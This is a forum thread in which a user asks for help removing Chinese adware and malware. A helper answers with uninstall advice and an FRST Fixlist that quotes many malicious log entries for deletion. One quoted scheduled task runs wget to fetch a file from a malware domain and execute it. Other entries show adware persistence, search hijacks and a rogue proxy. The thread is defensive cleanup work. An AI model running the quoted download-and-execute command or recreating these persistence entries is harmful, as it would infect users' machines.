Chinese viruses, computer cleanup, FRST logs

Cracc 07 Jan 2017 14:24 537 6
  • #1 07 Jan 2017 14:24
    Cracc
    Level 2  

    I would really appreciate help analyzing the FRST logs in order to remove these strange Chinese programs/viruses and to speed up the computer. I am attaching the FRST files.

    0 6
  • #2 07 Jan 2017 14:40
    Kolobos
    Computer specialist

    Uninstall:
    SpyHunter
    REACHit

    Boot the system into Safe Mode.

    Next to frst.exe, create a file named Fixlist.txt with the following content:
    CloseProcesses:
    Task: {04EE0B83-5C78-4035-AB42-896EDC2FB2DE} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe <==== UWAGA
    Task: {0CDFE8B0-8D13-4ADF-8A51-F03FFA66126C} - System32\Tasks\Lenovo\REACHit Agent Startup => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2015-12-10] (Lenovo)
    Task: {122A083A-14AB-4F9A-A3A9-A80762EA57BD} - System32\Tasks\{7513FE9C-810A-4461-9854-506254DD48E9} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.0.109/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {178AE5E5-FD37-41DE-BE69-BECC1CE2A596} - System32\Tasks\{9EE2E8B9-4308-4670-95D6-753BDEC9CE1C} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {179F3255-66CC-4F68-BEA2-8FB0FA0ABAC4} - System32\Tasks\{583370F7-583B-49C6-B9EF-B039604D5A6C} => D:\Programy\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe [2016-12-14] ()
    Task: {24B8167C-8B37-46D2-B45E-B531F3059DD0} - System32\Tasks\Origin => C:\Users\Woytek\AppData\Roaming\Origin\update.vbe <==== UWAGA
    Task: {26FF9F56-5F70-48B8-93AA-CB3586C6514A} - System32\Tasks\{41689995-65D8-1ED1-3BDC-6CAD038322A2} => C:\Users\Woytek\AppData\Roaming\PRICEF~1\sync.exe <==== UWAGA
    Task: {27E44C56-B2E6-4DDC-8548-E7BF19052CD4} - System32\Tasks\{C28AC561-E704-4958-9739-57D20BC1E78A} => D:\Gry\Frets on Fire\FretsOnFire.exe
    Task: {2C7E39EC-7E93-48E2-9C6F-14B0FC0F1E4F} - System32\Tasks\{35FA90FA-742D-47FE-93DF-75BD0D341536} => D:\Gry\Frets on Fire\FretsOnFire.exe
    Task: {2C805590-F7E7-432E-BEA5-B280D65BFF34} - System32\Tasks\SpyHunter4Startup => C:\Program Files (x86)\Enigma Software Group\SpyHunter\Spyhunter4.exe
    Task: {2D949739-F3AC-40BE-8808-E3712CDCC658} - System32\Tasks\WoytekConstructionistCurfewV2 => Rundll32.exe SnookersLapp.dll,main 7 1 <==== UWAGA
    Task: {305A0100-CC10-40B4-8D72-4A38A7E7A968} - System32\Tasks\WinTaske => C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe <==== UWAGA
    Task: {30EEE981-9001-4B9E-B762-E156645BDF2F} - System32\Tasks\svchost => C:\Users\Woytek\AppData\Local\Temp\yeaplayer51495.exe <==== UWAGA
    Task: {337B70AC-1D65-4AE3-8548-A5736F360E04} - System32\Tasks\{FC9656C1-6F9C-4FCC-B0F9-CB8686F38B90} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603




    Task: {345720E6-B0E3-44D1-8F77-3035FE401B3F} - System32\Tasks\{D6B2CFDB-44DD-4D52-88C7-501A7461013C} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.0.109/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {35B7B3DF-AFC0-4A62-9CFF-FF2F82DEFF4F} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: {3EDC2F7A-5E52-4E0E-B53B-5A6DB8596DBB} - System32\Tasks\Lenovo\REACHit Agent Update => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2015-12-10] (Lenovo)
    Task: {4251FD0D-B420-4715-AEF2-148FE9E6FC40} - System32\Tasks\{E212474B-5864-4FF1-BAF1-EC6898BAD7F9} => pcalua.exe -a C:\Users\Woytek\Desktop\GTA4RC.exe -d C:\Users\Woytek\Desktop
    Task: {45B89877-5489-4A27-9092-6B656A3A3FDE} - System32\Tasks\osTip => Chrome.exe <==== UWAGA
    Task: {49B9D45A-EB93-4E34-8CF8-444E387452BB} - System32\Tasks\{9D5C7727-5D33-4A97-A356-6DDC794902F6} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/abandoninstall?page=tsPlugin
    Task: {4F2857D2-A885-4F8C-AF3A-4D7EF5FE570E} - System32\Tasks\{08CB6F8C-AF04-4B80-A126-644E641267E6} => Chrome.exe hxxp://ui.skype.com/ui/0/7.0.0.102/pl/go/help.faq.installer?LastError=1603
    Task: {50938674-9152-485F-893E-96C441BC97CE} - System32\Tasks\{0B259A7D-B32F-4E86-A696-DF9CD2F4CCB5} => pcalua.exe -a D:\Gry\th\setup.exe -d D:\Gry\th
    Task: {51278CCE-FC28-4470-AA65-301FD14FF936} - System32\Tasks\SYSTEM => /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp hxxp://blockchainin.in/dat.bmp?data=N4ywvkzJaj3JNRgVEkln;Mc;1423679083 &amp; start cmd /R dat.bmp <==== UWAGA
    Task: {57A1656F-9312-4221-93AB-93AF24439E61} - System32\Tasks\{E48A4959-FCEF-417D-8FA9-5D45D606A4AB} => D:\Gry\Frets on Fire\FretsOnFire.exe
    Task: {597E11B0-5E88-40BC-9638-93844BDA0914} - System32\Tasks\{96B9C007-C3FC-4C91-BB54-6848B9205EE0} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{BE4BA698-8533-4F77-9559-C7F3F78C0B05}\setup.exe" -c -runfromtemp -l0x0015 -removeonly
    Task: {63DBC913-C2B3-4953-A25A-051ADCB44B20} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_286_pepper.exe [2016-01-20] (Adobe Systems Incorporated)
    Task: {6D63230A-7937-4D66-B60F-7BF447457BDC} - System32\Tasks\{33048F79-98E5-462D-9821-032A182471F7} => D:\Gry\simcity\SimCity\SimCity.exe
    Task: {6E9FB41E-C100-49AD-9ACC-651BFA842A09} - System32\Tasks\{1A3C19C2-B017-4001-ABD7-C59060C81CA4} => Chrome.exe hxxp://ui.skype.com/ui/0/7.10.0.101/pl/go/help.faq.installer?LastError=1603
    Task: {6EAE2604-7060-4053-BD4A-3306DC1FA7E6} - System32\Tasks\Opera scheduled Autoupdate 1392137253 => C:\Program Files (x86)\Opera\launcher.exe
    Task: {7553FCC9-0F12-41F8-BEF2-9A1A31114E6A} - System32\Tasks\{4D4E9FC6-C9D7-4820-9A2C-FED58E0CB7E0} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {79FABE18-ECA1-4D6B-A366-1318B1CDBE74} - \Microsoft\Windows\SystemRestore\FreeVPN -> Brak pliku <==== UWAGA
    Task: {7AC2552A-ED65-4209-A49B-0C2C3E86ABB1} - System32\Tasks\{9FE06523-46CE-4F9B-9A20-1FAB13962C04} => Chrome.exe hxxp://ui.skype.com/ui/0/7.0.0.102/pl/go/help.faq.installer?LastError=1603
    Task: {7FD913D8-1056-4FF4-90CE-AFCD9F58A264} - System32\Tasks\{5404577F-27AE-41CA-8DA6-2BDC153337AD} => pcalua.exe -a "D:\Muzyka\counter strike setup.exe" -d D:\Muzyka
    Task: {834D2EAC-CCA2-4AC1-BD11-30B8A6E7C75F} - System32\Tasks\{77C45A42-5354-49A1-88F9-8359E418B52E} => pcalua.exe -a "C:\Users\Woytek\Desktop\Nowy folder\Minecraft.exe" -d "C:\Users\Woytek\Desktop\Nowy folder"
    Task: {853A791F-BDD2-41FE-BA57-5BC045BE91CF} - System32\Tasks\{C5ADA0CE-391B-4E12-BA03-EB01F1F5690F} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {8931B5EE-DBF1-45B9-A66A-68C0A21639BC} - System32\Tasks\{A7A7881D-16A7-4B69-9D93-519E4DBA0916} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.0.112/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {8AD9FFCD-BA8E-4F50-A4AA-D7811852239D} - System32\Tasks\{00F0E5FD-1F1B-4036-BAFF-B1747A4FF70E} => D:\Gry\JoWood\Gothic2ZlotaEdycja\System\Gothic2.exe
    Task: {8D3D1663-3EA1-4EE2-AB3C-2DE3B15A7A85} - System32\Tasks\{21DB3A85-753F-46B3-879C-99620C18836E} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/help.faq.installer?LastError=1603
    Task: {911BA723-EEE8-4FC6-AE15-59C4B0A7A291} - System32\Tasks\{64A7C701-66F4-4C4B-8501-A6523E4FC880} => C:\Users\Woytek\Desktop\Install ETS2MP.exe <==== UWAGA
    Task: {91BD113A-8CB5-4209-B70A-43E4E6865B13} - System32\Tasks\FTdownloader V7.0-codedownloader => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-codedownloader.exe <==== UWAGA
    Task: {9223C191-2B88-49A4-996D-3142544C197C} - System32\Tasks\{E8DCADAD-AA99-4A61-97CC-009A883EA957} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {94254283-A550-4852-85B8-8DF1FFDBA146} - System32\Tasks\FTdownloader V7.0-enabler => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-enabler.exe <==== UWAGA
    Task: {95806657-272E-4408-AE0A-1E951DD887B5} - System32\Tasks\{660A067B-E3D9-4CBB-A2E1-504910000AD8} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {9A237410-D996-4FD0-BC03-3D4DDD5E469E} - System32\Tasks\{58A71229-250E-4E9C-B4B4-8C82E538D22C} => Chrome.exe hxxp://ui.skype.com/ui/0/7.0.0.102/pl/go/help.faq.installer?LastError=1603
    Task: {9F3ED200-C00C-4A4A-8718-6F90048F3239} - System32\Tasks\{F6F17348-4F07-4ADF-9A39-777A989C527E} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.0.112/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {A34B2DFC-F8A4-4198-A649-C0C546B84EE1} - System32\Tasks\{36A35404-CF5C-476B-AEEC-BAE18495AF5B} => C:\Users\Woytek\Desktop\Install ETS2MP.exe <==== UWAGA
    Task: {A65E9F7E-5370-4FE6-A605-B56B053421A6} - System32\Tasks\FTdownloader V7.0-chromeinstaller-dev => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-chromeinstaller.exe <==== UWAGA
    Task: {A931DA2D-FBF3-4756-A801-D97B4634A8BF} - System32\Tasks\FTdownloader V7.0-updater => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-updater.exe <==== UWAGA
    Task: {AB2FE784-8DC0-4346-9A5F-953CBCB3FEDB} - System32\Tasks\{0657BE5F-07CD-4597-9EE7-B5C9753530AF} => D:\Gry\Football Manager 2015\fm.exe
    Task: {AEDD8B62-541E-413F-BC22-860F1C46215B} - System32\Tasks\{3943C458-0D46-41DB-87B4-582741C65806} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/en/go/help.faq.installer?LastError=1603
    Task: {B3327154-573D-40D3-856C-7CD2587B85F1} - System32\Tasks\{8D36AB0A-693F-4517-859D-1C7BD49A6DAA} => D:\Gry\JoWood\Gothic2ZlotaEdycja\System\Gothic2.exe
    Task: {B932CEC4-CDC5-4C50-96D9-0F38F84AF349} - System32\Tasks\OptimizerPro1UpdaterTask{08EBDEA9-C622-4E1A-88D6-CC82F934351B} => C:\ProgramData\Premium\OptimizerPro1\OptimizerPro1.exe <==== UWAGA
    Task: {BB65E904-4F0F-4F07-B6B4-D4C6D01F7921} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: {C72F7031-6DB4-451A-A57A-2B480AAEFC33} - System32\Tasks\{BBF5EC42-7955-4D21-A36A-850B27A2075C} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.0.112/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {C99D86DB-3E08-4A46-BA0A-7F0D0E59895D} - System32\Tasks\{8BBF9D12-89D4-4761-B337-B2802AE32587} => C:\Program Files (x86)\Tencent\QQPCMgr\11.4.17339.217\Uninst.exe
    Task: {CCB4C6AE-A966-4597-940D-2540BAEBACFA} - \ProtectedSearch\Protected Search -> Brak pliku <==== UWAGA
    Task: {CDE588D8-05A4-449E-AF2F-EB3374AA4F64} - System32\Tasks\FTdownloader V7.0-firefoxinstaller => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-firefoxinstaller.exe <==== UWAGA
    Task: {D2A15F36-59FA-4CEA-AD0B-5F0D1E61D8B9} - System32\Tasks\{96CAAF79-1BA8-4DC4-A98A-DDB7B2E19E84} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {E229DDBB-F315-48B1-9124-58547D75A750} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv => C:\Windows\TEMP\{412D0394-A2BD-489B-9221-1A87F4249642}.exe <==== UWAGA
    Task: {E5711B19-EB8E-440E-884F-AB937272712E} - System32\Tasks\Driver Easy Scheduled Scan => d:\Programy\Easeware\DriverEasy\DriverEasy.exe [2016-10-02] (Easeware)
    Task: {E69F1FA2-26E7-44A8-8D18-90FFE9E4A372} - System32\Tasks\{90A676D9-59E2-4520-8664-195930F30CD8} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {E799C82D-18B6-40A6-AD87-F6D7D26BF99F} - System32\Tasks\{A34D58E0-00A9-4B20-859F-A854A09CDF79} => Chrome.exe hxxp://ui.skype.com/ui/0/6.21.0.104/pl/go/help.faq.installer?LastError=1603
    Task: {E88BC1BA-CB0B-45FC-AFE5-0A28ADCE9062} - System32\Tasks\{DEA4C14C-C080-4D1C-BA6D-2BB20E319993} => C:\Program Files (x86)\Gadu-Gadu 10\gg.exe
    Task: {E8B8EE23-7C9B-4640-A131-A0192CFE0E6E} - System32\Tasks\{FFAD804C-B7B7-448B-A296-146FF5AEFA34} => D:\Gry\PES 2015\PES2015.exe
    Task: {EAC4699D-6C0B-4895-8DA1-7A1F2EC70D1D} - System32\Tasks\{CDDA09C2-D4E2-47D8-9860-DF886B8DA5DA} => D:\Gry\JoWood\Gothic2ZlotaEdycja\System\Gothic2.exe
    Task: {EFA2BA1A-191A-4CBB-941E-B0ACE1D30C81} - System32\Tasks\Opera scheduled Autoupdate 1467742176 => C:\Program Files (x86)\Opera\launcher.exe
    Task: {F1986E0E-5D8B-4899-B503-65589E94DBC8} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_HP_rmv => C:\Windows\TEMP\{A240721D-5C5F-441F-B5DB-039407BB7F11}.exe <==== UWAGA
    Task: {F42C40A3-DC4C-4AE9-8974-2E8FC772E6EB} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo)
    Task: {F6A6A8EE-B59A-4D71-874C-18561B98BD9A} - System32\Tasks\WWE
    Task: {F6ADD75F-4665-490E-908A-CA4F88FCEB7F} - System32\Tasks\{C2F065A3-F525-4FA7-B4C6-9AF29AFC3652} => Chrome.exe hxxp://ui.skype.com/ui/0/6.21.0.104/pl/go/help.faq.installer?LastError=1603
    Task: {FFBC63F0-BD72-4908-A89B-F0CF8E1D34D4} - System32\Tasks\{5FFF0361-4FA0-452B-813A-1C1B2C11D4C6} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/help.faq.installer?LastError=1603
    Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_HP_rmv.job => C:\Windows\TEMP\{A240721D-5C5F-441F-B5DB-039407BB7F11}.exe <==== UWAGA
    Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{412D0394-A2BD-489B-9221-1A87F4249642}.exe <==== UWAGA
    Task: C:\Windows\Tasks\Driver Easy Scheduled Scan.job => d:\Programy\Easeware\DriverEasy\DriverEasy.exe
    Task: C:\Windows\Tasks\FTdownloader V7.0-chromeinstaller-dev.job => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-chromeinstaller.exe Íż/installcrx /agentregpath='FTdownloader V7.0' /extensionfilepath C:\Program Files (x86)\FTdownloader V7.0\49034.crx' /appid=49034 /srcid='000863' /subid='0' /zdata='0' /bic=F80CF60048F44D66A3F263ED798BB003IE /verifier=92ee4b4866421ca855a7b1cb300ddc56 /installerversion=1_33_153 /installerfullversion=1.33.153.1 /installationtime=1390218143 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== UWAGA
    Task: C:\Windows\Tasks\FTdownloader V7.0-codedownloader.job => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-codedownloader.exe Çš/reinstallapp /runfrom=task /agentregpath='FTdownloader V7.0' /appid=49034 /srcid='000863' /subid='0' /zdata='0' /bic=F80CF60048F44D66A3F263ED798BB003IE /verifier=92ee4b4866421ca855a7b1cb300ddc56 /installerversion=1_33_153 /installerfullversion=1.33.153.1 /installationtime=1390218143 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /codedownloaddomain=hxxp:/cr.install-daddy.com <==== UWAGA
    Task: C:\Windows\Tasks\FTdownloader V7.0-enabler.job => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-enabler.exe Ʀ/enablebho /agentregpath='FTdownloader V7.0' /appid=49034 /srcid='000863' /subid='0' /zdata='0' /bic=F80CF60048F44D66A3F263ED798BB003IE /verifier=92ee4b4866421ca855a7b1cb300ddc56 /installerversion=1_33_153 /installationtime=1390218143 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== UWAGA
    Task: C:\Windows\Tasks\FTdownloader V7.0-firefoxinstaller.job => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-firefoxinstaller.exe Î’/installxpi /agentregpath='FTdownloader V7.0' /extensionfilepath C:\Program Files (x86)\FTdownloader V7.0\49034.xpi' /appid=49034 /srcid='000863' /subid='0' /zdata='0' /bic=F80CF60048F44D66A3F263ED798BB003IE /verifier=92ee4b4866421ca855a7b1cb300ddc56 /installerversion=1_33_153 /installerfullversion=1.33.153.1 /installationtime=1390218143 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /waitforbrowser=300 /extensionid=0402d750-8010-4204-b167-01e83cb6f12d@694f8c69-18e7-4a97-8e6d-448c10f4a0ff.com /extensionversion=0.93 /prefsbranch=a0402d75080104204b16701e83cb6f12d694f8c6918e74a978e6d448c10f4a0ffcom49034 /updateurl=hxxps:/w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/49034.rdf <==== UWAGA
    Task: C:\Windows\Tasks\FTdownloader V7.0-updater.job => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-updater.exe Çľ/runupdater /agentregpath='FTdownloader V7.0' /appid=49034 /srcid='000863' /subid='0' /zdata='0' /bic=F80CF60048F44D66A3F263ED798BB003IE /verifier=92ee4b4866421ca855a7b1cb300ddc56 /installerversion=1_33_153 /installationtime=1390218143 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /geoserviceurl=hxxp:/ipgeoapi.com/ /updatejsondomain=hxxp:/update.srvstatsdata.com /updaterversion=2 /monetizationdomain=hxxp:/stats.syncstatsdata.com <==== UWAGA
    Task: C:\Windows\Tasks\OptimizerPro1UpdaterTask{08EBDEA9-C622-4E1A-88D6-CC82F934351B}.job => C:\ProgramData\Premium\OptimizerPro1\OptimizerPro1.exe J/schedule /profilepath C:\ProgramData\Premium\OptimizerPro1\profile.ini <==== UWAGA
    Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: C:\Windows\Tasks\{41689995-65D8-1ED1-3BDC-6CAD038322A2}.job => C:\Users\Woytek\AppData\Roaming\PRICEF~1\sync.exe <==== UWAGA
    2016-11-17 11:07 - 2016-11-17 11:07 - 00253352 _____ () c:\users\woytek\appdata\roaming\360bizhi\lpi\wpsvc.dll
    AlternateDataStreams: C:\ProgramData:NT [40]
    AlternateDataStreams: C:\ProgramData:NT2 [346]
    AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [23652]
    AlternateDataStreams: C:\Windows\system32\drivers:x64 [1479458]
    AlternateDataStreams: C:\Windows\system32\drivers:x86 [1205026]
    AlternateDataStreams: C:\Users\All Users:NT [40]
    AlternateDataStreams: C:\Users\All Users:NT2 [346]
    AlternateDataStreams: C:\Users\Woytek:Heroes & Generals [38]
    AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
    AlternateDataStreams: C:\ProgramData\Application Data:NT2 [346]
    AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT [40]
    AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT2 [346]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [346]
    AlternateDataStreams: C:\ProgramData\wget.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Users\Woytek\Dane aplikacji:NT [40]
    AlternateDataStreams: C:\Users\Woytek\Dane aplikacji:NT2 [346]
    AlternateDataStreams: C:\Users\Woytek\AppData\Roaming:NT [40]
    AlternateDataStreams: C:\Users\Woytek\AppData\Roaming:NT2 [346]
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service"
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\Software\Classes\regfile: regedit.exe "%1" <===== UWAGA
    Hosts:
    FirewallRules: [{56E20A04-36F2-4928-842A-C7576E9661F5}] => C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
    FirewallRules: [{21AF4C6E-ACB8-49D0-8B09-4D027C0D59CE}] => C:\Program Files (x86)\LuDaShi\ComputerZTray.exe
    FirewallRules: [{81F7C950-726E-4F2C-A9F4-D0C559DD04FB}] => C:\Program Files (x86)\LuDaShi\ComputerZTray.exe
    FirewallRules: [TCP Query User{064F3AF1-83D3-4001-A093-76C54881EEDD}C:\users\woytek\appdata\roaming\360bizhi\360wpsrv.exe] => C:\users\woytek\appdata\roaming\360bizhi\360wpsrv.exe
    FirewallRules: [UDP Query User{872D072C-0D0F-43C9-92D8-2AF38F85B611}C:\users\woytek\appdata\roaming\360bizhi\360wpsrv.exe] => C:\users\woytek\appdata\roaming\360bizhi\360wpsrv.exe
    Winlogon\Notify\WB: d:\Programy\Stardock\WindowBlinds\fast64.dll [X]
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\Run: [osmsg] => C:\ProgramData\WindowsMsg\chrome.exe [7204864 2016-12-06] ()
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\Run: [ComputerZ-Tray] => "C:\Program Files (x86)\LuDaShi\ComputerZTray.exe" /autorun
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\Run: [360wp-srv] => C:\Users\Woytek\AppData\Roaming\360bizhi\360wpsrv.exe [1636264 2017-01-05] (360.cn)
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\MountPoints2: I - I:\Autorun.exe
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\MountPoints2: {211cf585-f2df-11e1-ae40-902b34417a90} - J:\setup\rsrc\Autorun.exe
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\MountPoints2: {7dea8d2a-609a-11e3-8d07-902b34417a90} - K:\Startme.exe
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\MountPoints2: {bd4f10b0-f786-11e3-b1d3-902b34417a90} - I:\autorun.exe
    HKU\S-1-5-18\...\Run: [] => 0
    HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2013-03-20] (Microsoft Corporation)
    GroupPolicy: Ograniczenia <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    ProxyServer: [S-1-5-21-3510665200-3135124157-2897185096-1000] => http=127.0.0.1:13897
    RemoveProxy:
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
    SearchScopes: HKU\.DEFAULT -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://www.v9.com/web?type=ds&ts=14391972...4ca636442c77f076b2fg3z2c0t4gat4m5w2e9o&q={searchTerms}
    SearchScopes: HKU\.DEFAULT -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL =
    SearchScopes: HKU\.DEFAULT -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
    SearchScopes: HKU\S-1-5-19 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.google.com/search?q={searchTerms}
    SearchScopes: HKU\S-1-5-19 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://www.v9.com/web?type=ds&ts=14391972...4ca636442c77f076b2fg3z2c0t4gat4m5w2e9o&q={searchTerms}
    SearchScopes: HKU\S-1-5-20 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.google.com/search?q={searchTerms}
    SearchScopes: HKU\S-1-5-20 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://www.v9.com/web?type=ds&ts=14391972...4ca636442c77f076b2fg3z2c0t4gat4m5w2e9o&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3510665200-3135124157-2897185096-1000 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
    BHO: Brak nazwy -> {6E727987-C8EA-44DA-8749-310C0FBE3C3E} -> Brak pliku
    BHO-x32: Brak nazwy -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> Brak pliku
    FF Extension: (xRocket Toolbar) - C:\Users\Woytek\AppData\Roaming\Mozilla\Firefox\Profiles\qhr2alaj.default\Extensions\arthurj8283@gmail.com [2016-05-01] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\Woytek\AppData\Roaming\Mozilla\Firefox\Profiles\qhr2alaj.default\searchplugins\google-.xml [2016-02-10]
    FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Woytek\AppData\Roaming\Mozilla\Firefox\Profiles\qhr2alaj.default\extensions\arthurj8283@gmail.com
    FF HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\Firefox\Extensions: [{4539DA6C-FD3F-3DEE-48C3-CECC670FA24F}] - C:\Program Files (x86)\best-markit\161.xpi => nie znaleziono
    FF HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
    FF Extension: (McAfee Security Scan Plus) - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04] [Brak podpisu cyfrowego]
    FF Plugin-x32: @qq.com/npAndroidAssistant -> C:\Program Files (x86)\Common Files\Tencent\QQPhoneManager\2.0.201.3192\npQQPhoneManagerExt.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-3510665200-3135124157-2897185096-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-3510665200-3135124157-2897185096-1000: ubisoft.com/uplaypc -> d:\gry\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [Brak pliku]
    CHR Extension: (Quick Searcher) - C:\Users\Woytek\AppData\Local\Google\Chrome\User Data\Default\Extensions\acoiihnnfofnpbnofdcgcapbjlcopifa [2016-05-02]
    CHR Extension: (Adblock Super) - C:\Users\Woytek\AppData\Local\Google\Chrome\User Data\Default\Extensions\knebimhcckndhiglamoabbnifdkijidd [2015-09-14]
    da [2015-08-07]
    CHR Extension: (电脑管家上网防护) - C:\Users\Woytek\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2016-05-02]
